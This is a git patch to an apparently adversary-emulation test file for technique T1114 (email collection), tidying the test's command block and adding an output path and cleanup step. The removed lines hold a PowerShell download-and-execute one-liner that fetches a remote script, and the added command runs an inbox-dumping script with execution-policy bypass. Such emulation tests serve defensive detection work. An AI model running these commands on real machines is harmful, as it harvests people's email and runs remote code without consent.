From cf2879466d5c3edd7194339ff1e2bd3184e5f04b Mon Sep 17 00:00:00 2001
From: dwhite9 <daniel.shane.white@gmail.com>
Date: Wed, 18 Dec 2019 00:44:35 -0600
Subject: [PATCH] T1114 Update (#730)

* Removed text "comments" that were attempting to run as commands.
Simplified command block script execution. Added input arguments for
save path for script output. added cleanup commands.

* Replaced hard coded command with $PathToAtomicsFolder variable.
---
 atomics/T1114/T1114.yaml | 17 ++++++++---------
 1 file changed, 8 insertions(+), 9 deletions(-)

diff --git a/atomics/T1114/T1114.yaml b/atomics/T1114/T1114.yaml
index c7551369..d9bdd267 100644
--- a/atomics/T1114/T1114.yaml
+++ b/atomics/T1114/T1114.yaml
@@ -11,16 +11,15 @@ atomic_tests:
   
   supported_platforms:
     - windows
-  
+  input_arguments:
+    output_file:
+      description: Output file path
+      type: String
+      default: $home\desktop\mail.csv
   executor:
     name: command_prompt
     elevation_required: false
     command: |
-      Display email contents in the terminal
-        PS C:\> .\Get-Inbox.ps1
-
-      Write emails out to a CSV
-        PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
-      
-      Download and Execute
-        "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114/Get-Inbox.ps1')"
+      powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
+    cleanup_command: |
+      del #{output_file}